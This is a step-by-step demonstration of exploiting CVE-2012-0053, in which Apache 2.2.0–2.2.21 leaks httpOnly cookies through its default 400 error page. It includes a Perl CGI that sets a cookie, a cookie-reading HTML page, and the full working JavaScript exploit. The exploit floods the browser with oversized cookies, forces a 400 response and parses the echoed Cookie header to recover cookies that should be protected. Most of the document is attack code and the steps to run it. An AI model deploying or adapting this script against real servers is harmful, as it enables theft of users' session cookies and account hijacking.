Exploit: Apache httpOnly Cookie

Apache HTTP Server is prone to an information-disclosure vulnerability. The issue occurs in the default error response for status code 400.
Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.
The vulnerability affects Apache HTTP Server versions 2.2.0 through 2.2.21.
(source: http://www.securityfocus.com/bid/51706/discuss)



We will demo how to exploit apache httpOnly Cookie
Step 1
Create a perl file as follow and put in cgi-bin folder (ubuntu: /usr/lib/cgi-bin):
#!/usr/bin/perl

use CGI;
use CGI::Cookie;

my $cgi = new CGI;
my $cookie = CGI::Cookie->new(-name=>'CVE20120053',
 -value => 'testcookie',
 -expires => '+3M',
 -domain => 'localhost',
 -path => '/',
 -secure => 0,
 -httponly => 0
);
print $cgi->header(-cookie=>$cookie);


Step 2


Create html file to read a cookie like this:


<html>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>






Step 3


Open your browser and type url: http://localhost/cgi-bin/setcookie










We have success to create a cookie






Step 4


Open your browser again and type url: http://localhost/httponly/readcookie.html










We have success to inject cookie with javascript




Step 5


Edit setcookie file in cgi-bin folder and set httponly to 1


-httponly => 0


change with 1


-httponly => 1




Step 6


Open your browser again and type url: http://localhost/httponly/readcookie.html










We failed to inject cookie because httponly flag enabled.


In Apache Server version 2.2.0 - 2.2.21 has vulnerability in httponly that we can exploit it.






Step 7


Create file injection from http://www.exploit-db.com/exploits/18442/ as follow:



// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08



// Most browsers limit cookies to 4k characters, so we need multiple



function setCookies (good) {



    // Construct string for cookie value



    var str = "";



    for (var i=0; i< 819; i++) {



        str += "x";



    }



    // Set cookies



    for (i = 0; i < 10; i++) {



        // Expire evil cookie



        if (good) {



            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";



        }



        // Set evil cookie



        else {



            var cookie = "xss"+i+"="+str+";path=/";



        }



        document.cookie = cookie;



    }



}



 



function makeRequest() {



    setCookies();



 



    function parseCookies () {



        var cookie_dict = {};



        // Only react on 400 status



        if (xhr.readyState === 4 && xhr.status === 400) {



            // Replace newlines and match <pre> content



            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);



            if (content.length) {



                // Remove Cookie: prefix



                content = content[1].replace("Cookie: ", "");



                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);



                // Add cookies to object



                for (var i=0; i<cookies.length; i++) {



                    var s_c = cookies[i].split('=',2);



                    cookie_dict[s_c[0]] = s_c[1];



                }



            }



            // Unset malicious cookies



            setCookies(true);



            alert(JSON.stringify(cookie_dict));



        }



    }



    // Make XHR request



    var xhr = new XMLHttpRequest();



    xhr.onreadystatechange = parseCookies;



    xhr.open("GET", "/", true);



    xhr.send(null);



}



 



makeRequest();









Step 8


Open your browser again and type url: http://localhost/httponly/readcookie2.html







Bingo! We can inject cookie however httponly enabled